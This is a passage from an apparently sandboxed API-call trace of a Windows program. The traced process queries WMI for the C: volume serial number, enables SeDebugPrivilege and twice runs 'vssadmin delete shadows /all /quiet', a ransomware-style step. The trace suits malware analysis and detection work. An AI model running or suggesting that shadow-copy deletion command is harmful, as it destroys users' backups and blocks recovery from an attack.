puBuffLength=0x6ee96c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ee96c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0118.056] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee970 | out: ppv=0x6ee970*=0xb51e34) returned 0x0 [0118.056] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6ee968 | out: pAptType=0x6ee968*=1) returned 0x0 [0118.056] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ee96c | out: ppvObject=0x6ee96c*=0x0) returned 0x80004002 [0118.056] IUnknown:Release (This=0xb51e34) returned 0x0 [0118.057] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee590 | out: ppv=0x6ee590*=0x601f390) returned 0x0 [0118.057] WbemLocator:IUnknown:QueryInterface (in: This=0x601f390, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee7a8 | out: ppvObject=0x6ee7a8*=0x0) returned 0x80004002 [0118.057] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f390, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee7bc | out: ppvObject=0x6ee7bc*=0x60108d0) returned 0x0 [0118.057] WbemLocator:IUnknown:Release (This=0x601f390) returned 0x0 [0118.057] WbemLocator:IUnknown:QueryInterface (in: This=0x60108d0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee3dc | out: ppvObject=0x6ee3dc*=0x60108d0) returned 0x0 [0118.057] WbemLocator:IUnknown:QueryInterface (in: This=0x60108d0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee398 | out: ppvObject=0x6ee398*=0x0) returned 0x80004002 [0118.057] WbemLocator:IUnknown:AddRef (This=0x60108d0) returned 0x3 [0118.057] WbemLocator:IUnknown:QueryInterface (in: This=0x60108d0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edcf4 | out: ppvObject=0x6edcf4*=0x0) returned 0x80004002 [0118.058] WbemLocator:IUnknown:QueryInterface (in: This=0x60108d0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edca4 | out: ppvObject=0x6edca4*=0x0) returned 0x80004002 [0118.058] WbemLocator:IUnknown:QueryInterface (in: This=0x60108d0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edcb0 | out: ppvObject=0x6edcb0*=0x0) returned 0x80004002 [0118.058] CoGetContextToken (in: pToken=0x6edd10 | out: pToken=0x6edd10) returned 0x0 [0118.058] CoGetObjectContext (in: riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xbc77d4 | out: ppv=0xbc77d4*=0xb51e28) returned 0x0 [0118.058] CoGetContextToken (in: pToken=0x6ee118 | out: pToken=0x6ee118) returned 0x0 [0118.058] WbemLocator:IUnknown:QueryInterface (in: This=0x60108d0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee1a8 | out: ppvObject=0x6ee1a8*=0x0) returned 0x80004002 [0118.058] WbemLocator:IUnknown:Release (This=0x60108d0) returned 0x2 [0118.058] WbemLocator:IUnknown:Release (This=0x60108d0) returned 0x1 [0118.058] CoGetContextToken (in: pToken=0x6ee788 | out: pToken=0x6ee788) returned 0x0 [0118.058] CoGetContextToken (in: pToken=0x6ee6e8 | out: pToken=0x6ee6e8) returned 0x0 [0118.058] WbemLocator:IUnknown:QueryInterface (in: This=0x60108d0, riid=0x6ee7b8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee7b4 | out: ppvObject=0x6ee7b4*=0x60108d0) returned 0x0 [0118.058] WbemLocator:IUnknown:AddRef (This=0x60108d0) returned 0x3 [0118.058] WbemLocator:IUnknown:Release (This=0x60108d0) returned 0x2 [0118.058] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x601cc08, puCount=0x6ee94c | out: puCount=0x6ee94c*=0x2) returned 0x0 [0118.058] WbemDefPath:IWbemPath:GetText (in: This=0x601cc08, lFlags=8, puBuffLength=0x6ee948*=0x0, pszText=0x0 | out: puBuffLength=0x6ee948*=0xf, pszText=0x0) returned 0x0 [0118.058] WbemDefPath:IWbemPath:GetText (in: This=0x601cc08, lFlags=8, puBuffLength=0x6ee948*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ee948*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0118.059] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6ee824 | out: ppv=0x6ee824*=0x60108e0) returned 0x0 [0118.059] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60108e0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6ee8b8 | out: ppNamespace=0x6ee8b8*=0x6010cb4) returned 0x0 [0118.094] WbemLocator:IUnknown:QueryInterface (in: This=0x6010cb4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee754 | out: ppvObject=0x6ee754*=0xb5a9b4) returned 0x0 [0118.094] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5a9b4, pProxy=0x6010cb4, pAuthnSvc=0x6ee7a4, pAuthzSvc=0x6ee7a0, pServerPrincName=0x6ee798, pAuthnLevel=0x6ee79c, pImpLevel=0x6ee78c, pAuthInfo=0x6ee790, pCapabilites=0x6ee794 | out: pAuthnSvc=0x6ee7a4*=0xa, pAuthzSvc=0x6ee7a0*=0x0, pServerPrincName=0x6ee798, pAuthnLevel=0x6ee79c*=0x6, pImpLevel=0x6ee78c*=0x2, pAuthInfo=0x6ee790, pCapabilites=0x6ee794*=0x1) returned 0x0 [0118.094] WbemLocator:IUnknown:Release (This=0xb5a9b4) returned 0x1 [0118.094] WbemLocator:IUnknown:QueryInterface (in: This=0x6010cb4, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee748 | out: ppvObject=0x6ee748*=0xb5a9d4) returned 0x0 [0118.094] WbemLocator:IUnknown:QueryInterface (in: This=0x6010cb4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee744 | out: ppvObject=0x6ee744*=0xb5a9b4) returned 0x0 [0118.095] WbemLocator:IClientSecurity:SetBlanket (This=0xb5a9b4, pProxy=0x6010cb4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0118.095] WbemLocator:IUnknown:Release (This=0xb5a9b4) returned 0x2 [0118.095] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x1 [0118.095] CoTaskMemFree (pv=0xbd47c8) [0118.095] WbemLocator:IUnknown:Release (This=0x60108e0) returned 0x0 [0118.095] WbemLocator:IUnknown:QueryInterface (in: This=0x6010cb4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee344 | out: ppvObject=0x6ee344*=0xb5a9d4) returned 0x0 [0118.095] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee300 | out: ppvObject=0x6ee300*=0x0) returned 0x80004002 [0118.096] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee11c | out: ppvObject=0x6ee11c*=0x0) returned 0x80004002 [0118.096] WbemLocator:IUnknown:AddRef (This=0xb5a9d4) returned 0x3 [0118.096] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edc5c | out: ppvObject=0x6edc5c*=0x0) returned 0x80004002 [0118.096] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edc0c | out: ppvObject=0x6edc0c*=0x0) returned 0x80004002 [0118.097] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edc18 | out: ppvObject=0x6edc18*=0xb5a934) returned 0x0 [0118.097] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5a934, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edc20 | out: pCid=0x6edc20*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0118.097] WbemLocator:IUnknown:Release (This=0xb5a934) returned 0x3 [0118.097] CoGetContextToken (in: pToken=0x6edc78 | out: pToken=0x6edc78) returned 0x0 [0118.097] CoGetContextToken (in: pToken=0x6ee080 | out: pToken=0x6ee080) returned 0x0 [0118.097] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee110 | out: ppvObject=0x6ee110*=0xb5a9bc) returned 0x0 [0118.098] WbemLocator:IRpcOptions:Query (in: This=0xb5a9bc, pPrx=0xb5a9d4, dwProperty=2, pdwValue=0x6ee138 | out: pdwValue=0x6ee138) returned 0x80004002 [0118.098] WbemLocator:IUnknown:Release (This=0xb5a9bc) returned 0x3 [0118.098] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x2 [0118.098] CoGetContextToken (in: pToken=0x6ee658 | out: pToken=0x6ee658) returned 0x0 [0118.098] CoGetContextToken (in: pToken=0x6ee5b8 | out: pToken=0x6ee5b8) returned 0x0 [0118.098] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x6ee688*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6ee684 | out: ppvObject=0x6ee684*=0x6010cb4) returned 0x0 [0118.098] WbemLocator:IUnknown:AddRef (This=0x6010cb4) returned 0x4 [0118.098] WbemLocator:IUnknown:Release (This=0x6010cb4) returned 0x3 [0118.098] WbemLocator:IUnknown:Release (This=0x6010cb4) returned 0x2 [0118.098] SysStringLen (param_1=0x0) returned 0x0 [0118.098] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010910, puCount=0x6eea1c | out: puCount=0x6eea1c*=0x0) returned 0x0 [0118.098] WbemDefPath:IWbemPath:GetText (in: This=0x6010910, lFlags=2, puBuffLength=0x6eea18*=0x0, pszText=0x0 | out: puBuffLength=0x6eea18*=0x20, pszText=0x0) returned 0x0 [0118.098] WbemDefPath:IWbemPath:GetText (in: This=0x6010910, lFlags=2, puBuffLength=0x6eea18*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6eea18*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0118.098] CoGetContextToken (in: pToken=0x6ee688 | out: pToken=0x6ee688) returned 0x0 [0118.098] WbemLocator:IUnknown:AddRef (This=0xb5a9d4) returned 0x3 [0118.098] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee51c | out: ppvObject=0x6ee51c*=0xb5a9d4) returned 0x0 [0118.098] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x3 [0118.098] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x2 [0118.099] WbemDefPath:IWbemPath:GetText (in: This=0x6010910, lFlags=2, puBuffLength=0x6eea20*=0x0, pszText=0x0 | out: puBuffLength=0x6eea20*=0x20, pszText=0x0) returned 0x0 [0118.099] WbemDefPath:IWbemPath:GetText (in: This=0x6010910, lFlags=2, puBuffLength=0x6eea20*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6eea20*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0118.102] IWbemServices:GetObject (in: This=0x6010cb4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6ee9d4*=0x0, ppCallResult=0x0 | out: ppObject=0x6ee9d4*=0x601ef58, ppCallResult=0x0) returned 0x0 [0118.128] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x601cc08, puCount=0x6ee9d4 | out: puCount=0x6ee9d4*=0x2) returned 0x0 [0118.128] WbemDefPath:IWbemPath:GetText (in: This=0x601cc08, lFlags=4, puBuffLength=0x6ee9d0*=0x0, pszText=0x0 | out: puBuffLength=0x6ee9d0*=0xf, pszText=0x0) returned 0x0 [0118.128] WbemDefPath:IWbemPath:GetText (in: This=0x601cc08, lFlags=4, puBuffLength=0x6ee9d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ee9d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0118.129] IWbemClassObject:Get (in: This=0x601ef58, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6ee9d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3892520*=0, plFlavor=0x3892524*=0 | out: pVal=0x6ee9d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3892520*=8, plFlavor=0x3892524*=0) returned 0x0 [0118.129] SysStringByteLen (bstr="9C354B42") returned 0x10 [0118.129] SysStringByteLen (bstr="9C354B42") returned 0x10 [0118.129] IWbemClassObject:Get (in: This=0x601ef58, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6ee9d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3892520*=8, plFlavor=0x3892524*=0 | out: pVal=0x6ee9d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3892520*=8, plFlavor=0x3892524*=0) returned 0x0 [0118.129] SysStringByteLen (bstr="9C354B42") returned 0x10 [0118.129] SysStringByteLen (bstr="9C354B42") returned 0x10 [0118.163] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0118.163] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0118.166] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0118.169] GetProcAddress (hModule=0x76d30000, lpProcName="CreatePipe") returned 0x76dc415b [0118.173] GetProcAddress (hModule=0x76d30000, lpProcName="CreatePipeW") returned 0x0 [0118.174] CreatePipe (in: hReadPipe=0x6eea60, hWritePipe=0x6eea5c, lpPipeAttributes=0x6ee9e0, nSize=0x0 | out: hReadPipe=0x6eea60*=0x45c, hWritePipe=0x6eea5c*=0x4ac) returned 1 [0118.177] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x45c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6eea64, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6eea64*=0x4b0) returned 1 [0118.177] CloseHandle (hObject=0x45c) returned 1 [0118.177] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0118.178] CoTaskMemAlloc (cb=0x20e) returned 0xbd7c08 [0118.178] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0xbd7c08 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0118.178] CoTaskMemFree (pv=0xbd7c08) [0118.178] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"cmd.exe\" /c vssadmin.exe delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x6ee980*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4ac, hStdError=0x0), lpProcessInformation=0x38956ec | out: lpCommandLine="\"cmd.exe\" /c vssadmin.exe delete shadows /all /quiet", lpProcessInformation=0x38956ec*(hProcess=0x4b4, hThread=0x45c, dwProcessId=0x5bc, dwThreadId=0x874)) returned 1 [0118.193] GetConsoleOutputCP () returned 0x0 [0118.194] GetFileType (hFile=0x4b0) returned 0x3 [0118.195] CloseHandle (hObject=0x45c) returned 1 [0118.197] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValue") returned 0x0 [0118.197] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0118.197] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x6ee43c | out: lpLuid=0x6ee43c*(LowPart=0x14, HighPart=0)) returned 1 [0118.198] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0118.199] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessTokenW") returned 0x0 [0118.199] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x6ee438 | out: TokenHandle=0x6ee438*=0x45c) returned 1 [0118.199] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0118.200] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivilegesW") returned 0x0 [0118.200] AdjustTokenPrivileges (in: TokenHandle=0x45c, DisableAllPrivileges=0, NewState=0x38992a8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0118.200] CloseHandle (hObject=0x45c) returned 1 [0118.200] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xbe0) returned 0x45c [0118.201] GetExitCodeProcess (in: hProcess=0x45c, lpExitCode=0x3899234 | out: lpExitCode=0x3899234*=0x103) returned 1 [0118.211] SysReAllocStringLen (in: pbstr=0x6edf30*=0x0, psz="Kernel32.dll", len=0xc | out: pbstr=0x6edf30*="Kernel32.dll") returned 1 [0118.211] CharLowerBuffW (in: lpsz="Kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0118.212] LoadLibraryExW (lpLibFileName="Kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0118.212] GetLastError () returned 0x0 [0118.216] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0118.575] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64ProcessW") returned 0x0 [0118.575] IsWow64Process (in: hProcess=0x45c, Wow64Process=0x6eeb90 | out: Wow64Process=0x6eeb90) returned 1 [0118.585] GetProcAddress (hModule=0x76d30000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76d5d650 [0118.588] GetProcAddress (hModule=0x76d30000, lpProcName="Wow64DisableWow64FsRedirectionW") returned 0x0 [0118.588] Wow64DisableWow64FsRedirection (in: OldValue=0x6eebfc | out: OldValue=0x6eebfc*=0x0) returned 1 [0118.589] CoTaskMemAlloc (cb=0x20c) returned 0xbd7c08 [0118.589] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0xbd7c08 | out: pszPath="C:\\Windows") returned 0x0 [0118.590] CoTaskMemFree (pv=0xbd7c08) [0118.590] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x6ee5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0118.590] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"cmd\" /C vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows", lpStartupInfo=0x6ee990*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x38999a0 | out: lpCommandLine="\"cmd\" /C vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x38999a0*(hProcess=0x4b8, hThread=0x4bc, dwProcessId=0x5e0, dwThreadId=0xbd8)) returned 1 [0119.132] CloseHandle (hObject=0x4bc) returned 1 [0119.142] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb24 | out: ppv=0x6eeb24*=0xb51e34) returned 0x0 [0119.142] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb1c | out: pAptType=0x6eeb1c*=1) returned 0x0 [0119.142] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb20 | out: ppvObject=0x6eeb20*=0x0) returned 0x80004002 [0119.142] IUnknown:Release (This=0xb51e34) returned 0x1 [0119.143] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee490 | out: ppv=0x6ee490*=0x60108e0) returned 0x0 [0119.143] WbemDefPath:IUnknown:QueryInterface (in: This=0x60108e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee6a8 | out: ppvObject=0x6ee6a8*=0x0) returned 0x80004002 [0119.143] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60108e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6bc | out: ppvObject=0x6ee6bc*=0x6010bf0) returned 0x0 [0119.143] WbemDefPath:IUnknown:Release (This=0x60108e0) returned 0x0 [0119.143] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010bf0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2dc | out: ppvObject=0x6ee2dc*=0x6010bf0) returned 0x0 [0119.143] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010bf0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee298 | out: ppvObject=0x6ee298*=0x0) returned 0x80004002 [0119.143] WbemDefPath:IUnknown:AddRef (This=0x6010bf0) returned 0x3 [0119.144] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010bf0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, 